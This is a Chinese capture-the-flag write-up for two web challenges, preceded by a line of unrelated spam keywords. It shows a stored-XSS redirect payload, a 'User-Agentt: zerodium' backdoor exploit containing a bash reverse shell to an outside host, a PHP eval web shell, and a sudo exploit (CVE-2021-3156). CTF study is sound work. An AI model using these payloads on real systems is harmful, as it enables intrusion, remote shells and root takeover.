免费的公司网站怎么做,租赁公司网站源码,wordpress 文章行距,下载优化大师app文章目录 门酱想玩什么呢#xff1f;Becomeroot 门酱想玩什么呢#xff1f;
打开题目#xff0c;加载完视频后要求我们给个游戏链接 点开评论区不难发现应该是想玩元梦之星#xff0c;这里有个评论功能可以上传图片 我们随便输入点东西发现是插入并赋值到content元素里面 … 文章目录 门酱想玩什么呢Becomeroot 门酱想玩什么呢
打开题目加载完视频后要求我们给个游戏链接 点开评论区不难发现应该是想玩元梦之星这里有个评论功能可以上传图片 我们随便输入点东西发现是插入并赋值到content元素里面 猜测是存储型xss我们去看看hint访问下/nssctfroundSpring.php
?php
highlight_file(__FILE__);
//部分关键代码
$contentLines explode( , $comment[content]);
if (preg_match(/^https?:\/\/\S$/, $contentLines[0])) {if (preg_match(/^https?:\/\/[^\/]\/\S\.png$/, $contentLines[0], $matches) end($contentLines) /png) {$urlParts parse_url($matches[0]);if ($urlParts ! false) {echo img classcontent src . $matches[0] . ;//.......}//......}//......
} 大概就是对评论的图片链接格式的过滤
我们要跳转到元梦之星用到location去跳转最基础的payload
scriptdocument.locationhttps://ymzx.qq.com/script然后按照上文的匹配条件修改一下以及闭合前面的和最终构如下
http://scriptdocument.locationhttps://ymzx.qq.com/script.png /png成功跳转元梦之星
然后就是如何给门酱一个链接 也就是说需要门酱自己网站的链接去跳转由于我们通过xss语句已经插入到img的src中实现跳转到元梦之星
所以我们只需要抓包跳转时的界面就可以得到门酱跳转时的请求参数值 拼接上题目路径即可
http://node4.anna.nssctf.cn:28757/words/?titlecmV2MXZlcontentaHR0cCUzQSUyRiUyRiUyMiUzRSUzQ3NjcmlwdCUzRWRvY3VtZW50LmxvY2F0aW9uJTNEJTIyaHR0cHMlM0ElMkYlMkZ5bXp4LnFxLmNvbSUyMiUzQyUyRnNjcmlwdCUzRS5wbmclMjAlMkZwbmc%3D得到flag Becomeroot
打开题目提示在/root里面应该是最后要提权 按照提示和php开发仓库入侵有关搜出来刚好是对应题目php版本可以利用User-Agentt头来命令执行 参考文章
我们bp抓包构造如下
User-Agentt: zerodiumsystem(bash -c bash -i /dev/tcp/5i781963p2.yicp.fun/58265 01);反弹成功接下来尝试sh脚本提权发现不行
提示说和sudo提权有关刚刚试了sudo -l -S是需要密码的所以肯定是存在提权漏洞
搜出来CVE-2021-3156 nc连接的靶机上传脚本比较麻烦所以我们写马利用蚁剑上传
User-Agentt: zerodiumsystem(echo ?php eval(\$_POST[1]);?/var/www/html/shell.php);漏洞exp利用链接
上传成功 然后再nc连接成功提权 得到flag
